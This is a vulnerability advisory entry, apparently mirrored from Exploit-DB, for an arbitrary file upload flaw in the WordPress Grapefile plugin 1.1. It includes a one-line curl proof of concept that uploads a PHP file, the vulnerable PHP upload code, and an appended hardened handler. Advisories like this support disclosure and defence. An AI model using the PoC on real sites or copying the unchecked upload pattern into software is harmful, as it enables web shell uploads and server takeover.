vendor: Grapefile
by: Hrvoje Spoljar
CVSS: 9.3 HIGH
Arbitrary File Upload
CWE: 264
Product Name: Grapefile
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: YES
Related CWE: N/A
CPE: o:wordpress:grapefile:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2011

WordPress grapefile plugin <= 1.1 Arbitrary file upload

Version 1.1 of the grapefile plugin for WordPress is vulnerable to arbitrary file upload. An attacker can upload malicious files to the server, such as a web shell, which can be used to gain remote access to the server. The vulnerability exists due to the lack of proper input validation in grapeupload.php, grapeupload2.php, grapeupload3.php, and grapeupload4.php: the code moves the uploaded file into the plugin's filestore directory under its client-supplied name without checking its type. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request containing a malicious file to the vulnerable server.

Mitigation:

Upgrade to the latest version of the grapefile plugin.
Source

Exploit-DB raw data:

Title: Wordpress grapefile plugin <= 1.1 Arbitrary file upload
Date: 30-8-2011
Author: Hrvoje Spoljar [ hrvoje.spoljar(at)gmail.com ]
Version: 1.1
Software link: http://wordpress.org/extend/plugins/grapefile/

PoC:
curl -F "userfile=@mycode.php" http://domain.tld/wp-content/plugins/grapefile/grapeupload.php

File(s): grapeupload.php  grapeupload2.php  grapeupload3.php  grapeupload4.php
Vulnerable code:
$uploaddir = $_SERVER["DOCUMENT_ROOT"].'/wp-content/plugins/grapefile/filestore/avi/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
  echo "success";
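
For contrast with the vulnerable code above, a hardened upload handler is sketched here as an added example; it is not part of the original advisory and is not Grapefile's actual patch. The function name store_upload, the ALLOWED_TYPES allowlist and its MIME values are assumptions, and PHP 7+ with the fileinfo extension is assumed.

```php
<?php
// Added example (not Grapefile code). Assumed allowlist: extension => MIME
// types that server-side content sniffing may report for that extension.
const ALLOWED_TYPES = [
    'avi' => ['video/x-msvideo', 'video/avi'],
];

// Hypothetical helper: validates one $_FILES entry and stores it in $destDir.
function store_upload(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        throw new RuntimeException('upload failed');
    }
    // The client-supplied name is read only to pick an allowlisted extension.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // Sniff the content on the server; $_FILES[...]['type'] is client-controlled.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ALLOWED_TYPES[$ext], true)) {
        throw new RuntimeException('content does not match extension');
    }
    // Server-generated name: a name such as "x.php.avi" never reaches the disk.
    $target = rtrim($destDir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store file');
    }
    chmod($target, 0640); // readable data file, never executable
    return $target;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['userfile'])) {
    $dir = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/grapefile/filestore/avi/';
    try {
        store_upload($_FILES['userfile'], $dir);
        echo 'success';
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'rejected'; // no detail returned to the client
    }
}
```

The upload directory should also be configured so the web server does not execute scripts from it, since the checks above only constrain what is written there.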